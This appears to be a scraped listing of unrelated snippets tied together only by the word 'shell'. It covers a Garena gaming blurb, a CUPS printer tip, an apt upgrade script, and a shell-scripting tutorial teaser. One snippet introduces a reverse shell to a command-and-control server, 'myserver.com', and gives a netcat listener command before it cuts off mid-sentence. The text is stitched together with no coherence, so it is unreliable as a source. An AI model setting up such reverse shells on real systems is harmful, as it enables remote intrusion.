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Garena is a digital entertainment platform for E-Sports, connecting world gamers by publishing Garena Games, providing support and maintenance for the Garena Games, and promoting Garena Shell bd (MY).
How to add a remote shared printer within CUPS using a couple of shell commands
apt-upgrade - Shell script for easier upgrading the system using apt and, when present, snap, flatpak and fwupdmgr.
The below is an example of a simple reverse shell to a C&C server (which we assume is myserver.com) On the C&C server you simply need something listening on the relevant port: nc -l 4444 Back when Shellshock was at it's highest levels, you could simply i...
Learn how to inscribe your thoughts, dreams, and desires into your computer and take your command line skills to the next level by learning how to write simple programs called shell scripts. In a way, invoking commands one at a time is like writing a prog...